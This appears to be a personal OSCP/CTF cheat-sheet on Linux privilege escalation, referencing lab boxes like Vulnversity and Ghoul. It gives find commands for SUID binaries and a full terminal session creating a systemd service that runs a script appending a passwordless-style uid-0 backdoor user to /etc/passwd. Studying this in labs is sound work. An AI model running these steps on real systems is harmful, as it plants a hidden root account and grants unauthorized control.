SUID wins!

SUID- it runs the file with the permissions of the file owner. (if the file owner is root, we can run it as root) 
Find: 
​
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
Vulnversity (Privilege Escalation)
Progressive OSCP
OR 
create a service that executes /dev/shm/root.sh:
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
created /dev/shm/root.sh which echoes:
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
to /etc/passwd to enable us to su as root with the credentials rooot : AAAA. (Check Ghoul).

[email protected]:/dev/shm$ nano root.service
[email protected]:/dev/shm$ cat root.service
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
[email protected]:/dev/shm$ nano root.sh
[email protected]:/dev/shm$ chmod +x root.sh
[email protected]:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
[email protected]:/dev/shm$ 
I enabled the service and started it:
[email protected]:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
[email protected]:/dev/shm$ systemctl start root.service
[email protected]:/dev/shm$
Check /etc/passwd
and su rooot with the creds
no_root_squash!
bin/bash
Last modified 11mo ago